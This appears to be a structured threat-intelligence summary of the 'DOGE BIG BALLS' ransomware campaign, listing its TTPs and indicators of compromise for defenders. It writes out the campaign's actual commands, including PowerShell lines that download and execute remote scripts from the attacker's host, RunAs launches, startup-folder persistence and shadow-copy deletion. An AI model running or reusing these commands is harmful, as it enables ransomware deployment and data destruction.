summary: "A recent ransomware operation utilizes a deceptive ZIP file with a malicious LNK shortcut, multi-stage PowerShell scripts, and a vulnerable Intel driver (CVE-2015-2291) for privilege escalation. The malware, 'DOGE BIG BALLS Ransomware,' incorporates psychological manipulation tactics and precise geolocation tracking via the Wigle.net API."
date: "N/A" # Date not provided in report
author: "Cyble Research and Intelligence Labs (CRIL)"
attribution: "Unknown" # Threat actor attribution is not specified
malware_families:
  - Fog
  - DOGE BIG BALLS Ransomware
  - Havoc C2 beacon
TTPs:
  processs:
    - cmd.exe
    - powershell.exe
    - Adobe Acrobat.exe
    - ktool.exe
    - vssadmin.exe
  commandline:
    - "C:\Windows\System32\cmd.exe /c start wscript.exe \\\"https://hilarious-trifle-d9182e.netlify.app/stage1.ps1\\\""
    - "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File stage1.ps1"
    - "Start-Process -FilePath C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Acrobat.exe -ArgumentList '' -Verb RunAs"
    - "C:\\%TEMP%\\ktool.exe <PID> <hardcoded_key>"
    - "vssadmin.exe delete shadows /all /quiet"
  powershell:
    - "Invoke-WebRequest -Uri 'https://hilarious-trifle-d9182e.netlify.app/stage1.ps1' -OutFile stage1.ps1; IEX (Get-Content stage1.ps1)"
    - "if ($env:USERNAME -match '\\\\') { $startup_dir = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\' } else { $startup_dir = '$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\' }"
    - "Invoke-WebRequest -Uri 'https://hilarious-trifle-d9182e.netlify.app/cwiper.exe' -OutFile $hidden_path + '\\Adobe Acrobat.exe'"
    - "Start-Process -FilePath $hidden_path + '\\Adobe Acrobat.exe' -ArgumentList '' -Verb RunAs"
    - "Invoke-WebRequest -Uri 'https://hilarious-trifle-d9182e.netlify.app/ktool.exe' -OutFile %TEMP%\ktool.exe"
    - "Start-Process -FilePath %TEMP%\\ktool.exe -ArgumentList '<PID> <hardcoded_key>' -Wait"
    - "Invoke-WebRequest -Uri 'https://hilarious-trifle-d9182e.netlify.app/lootsubmit.ps1' -OutFile lootsubmit.ps1; IEX (Get-Content lootsubmit.ps1)"
  registry_keys:
    - "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" #Implied persistence via startup folder
  network_connections:
    - "hilarious-trifle-d9182e.netlify.app"
    - "api.wigle.net"
  file_modifications:
    - "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\hidden\Adobe Acrobat.exe"
    - "%TEMP%\ktool.exe"
    - "DbgLog.sys"
    - "RANSOMNOTE.txt"
    - "readme.txt"
  persistence:
    - "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\hidden\" # Startup folder persistence
    - "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hidden\" # User specific startup folder
  pipes: []
  process_relations:
    - powershell.exe -> cmd.exe
    - powershell.exe -> Adobe Acrobat.exe
    - powershell.exe -> ktool.exe
    - ktool.exe -> iqvw64e.sys (driver load)

IOCs:
  hashes: [] # No hashes provided in the report
  ips: [] # No IPs provided in the report
  domains:
    - "hilarious-trifle-d9182e.netlify.app"
  urls:
    - "hxxps://hilarious-trifle-d9182e.netlify.app/stage1.ps1"
    - "hxxps://hilarious-trifle-d9182e.netlify.app/cwiper.exe"
    - "hxxps://hilarious-trifle-d9182e.netlify.app/ktool.exe"
    - "hxxps://hilarious-trifle-d9182e.netlify.app/lootsubmit.ps1"
    - "https://api.wigle.net/api" # Wigle API endpoint
reference: https://cyble.com/blog/doge-big-balls-ransomware-edward-coristine/
